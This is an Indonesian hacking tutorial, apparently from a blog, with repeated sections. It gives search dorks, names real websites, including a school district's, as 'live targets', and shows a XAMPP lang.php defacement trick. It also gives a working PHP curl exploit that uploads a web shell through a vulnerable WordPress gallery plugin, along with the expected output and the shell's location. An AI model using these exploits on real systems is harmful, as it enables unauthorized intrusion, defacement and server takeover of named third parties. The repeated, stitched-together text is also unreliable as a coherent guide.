Bismillahirrahmanirrahiim,
sebelumnya saya mohon maaf, jika ada step yg kalian tidak mengerti, dikarenakan saya sedang males bikin tutorial :D
untuk dork :
intitle:"XAMPP Version 1.6.0"
intitle:"XAMPP Version 1.5."
Live Target :
http://moodle.wilmington.k12.oh.us/xampp/
buka website target, dan masukkan exploit berikut :
/xampp/lang.php?Hacked+By+Nicknamemu
nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.
disini saya mendapatkan pesan error seperti ini :
lalu kita ganti "index.php" menjadi "lang.tmp"
selesai ^_^.
sebelumnya saya mohon maaf, jika ada step yg kalian tidak mengerti, dikarenakan saya sedang males bikin tutorial :D
untuk dork :
intitle:"XAMPP Version 1.6.0"
intitle:"XAMPP Version 1.5."
Live Target :
http://moodle.wilmington.k12.oh.us/xampp/
buka website target, dan masukkan exploit berikut :
/xampp/lang.php?Hacked+By+Nicknamemu
nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.
disini saya mendapatkan pesan error seperti ini :
lalu kita ganti "index.php" menjadi "lang.tmp"
selesai ^_^.
Bismillahirrahmanirrahim,
oke, pertama² kalian harus download dan install xampp ~> Tutorial & Link Download Xampp
yang kedua, kalian membutuhkan exploitnya :
untuk Dork :
inurl:/wp-content/plugins/complete-gallery-manager/
live target :
http://primewebconsulting.com/
http://www.alpinegranite.com/
start xampp, dan klik Svc [Apache] ~> Start ~> Admin
nanti akan muncul sebuah tab browser, jngn ditutup, buka tab browser tersebut, klik bahasa yang kalian inginkan.
klik start ~> Run ~> ketik "Cmd"
nanti akan muncul Command Prompt
ketik "cd \"
terus ketik "xampp/php"
oh iya, save file exploit & shell kalian di folder C:\Xampp\php\
setelah disave di folder php, kalian cari file php.ini :
buka file tersebut, lalu pencet ctrl+f dan ketik "curl" lalu klik Find Next. :
nanti akan muncul text seperti ini ";extension=php_curl.dll"
hapus tanda ";" disamping "extension=" lalu klik save.
disini saya anggap kalian sudah mengedit script exploitnya, sekarang kembali ke cmd dan ketik "php fileexploitnya.php" dan pencet enter.
nanti akan muncul text seperti ini :
{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/xeno-x.php","filename":"xeno","width":null,
"height":null}]}
C:\xampp\php>
bila tidak muncul text seperti itu, berarti website tersebut tidak vuln.
tempat shell yang terupload :
http://target.com/wp-content/uploads/2013/10/shell.php
oke, pertama² kalian harus download dan install xampp ~> Tutorial & Link Download Xampp
yang kedua, kalian membutuhkan exploitnya :
<?php$uploadfile="namashellkalian.php";$ch= curl_init("http://target.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult= curl_exec($ch);curl_close($ch);"$postResult";?>
untuk Dork :
inurl:/wp-content/plugins/complete-gallery-manager/
live target :
http://primewebconsulting.com/
http://www.alpinegranite.com/
start xampp, dan klik Svc [Apache] ~> Start ~> Admin
nanti akan muncul sebuah tab browser, jngn ditutup, buka tab browser tersebut, klik bahasa yang kalian inginkan.
klik start ~> Run ~> ketik "Cmd"
nanti akan muncul Command Prompt
ketik "cd \"
terus ketik "xampp/php"
oh iya, save file exploit & shell kalian di folder C:\Xampp\php\
setelah disave di folder php, kalian cari file php.ini :
buka file tersebut, lalu pencet ctrl+f dan ketik "curl" lalu klik Find Next. :
nanti akan muncul text seperti ini ";extension=php_curl.dll"
hapus tanda ";" disamping "extension=" lalu klik save.
disini saya anggap kalian sudah mengedit script exploitnya, sekarang kembali ke cmd dan ketik "php fileexploitnya.php" dan pencet enter.
nanti akan muncul text seperti ini :
{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/xeno-x.php","filename":"xeno","width":null,
"height":null}]}
C:\xampp\php>
bila tidak muncul text seperti itu, berarti website tersebut tidak vuln.
tempat shell yang terupload :
http://target.com/wp-content/uploads/2013/10/shell.php
Bismillahirrahmanirrahiim,
yang kalian butuhkan adalah installernya :
Xampp
setelah di download, ikuti cara dibawah ini :
1. bukan & langsung klik install.
2. ketik y dan tekan enter (jika sudah ada tekan enter saja).
3. Jika ada command seperti ini, ketik 1 dan pencet enter.
4. kemudian ketik "x" dan pencet enter.
nanti akan muncul sebuah Control Panel Xampp. dan selesai ^_^
yang kalian butuhkan adalah installernya :
Xampp
setelah di download, ikuti cara dibawah ini :
1. bukan & langsung klik install.
3. Jika ada command seperti ini, ketik 1 dan pencet enter.
nanti akan muncul sebuah Control Panel Xampp. dan selesai ^_^
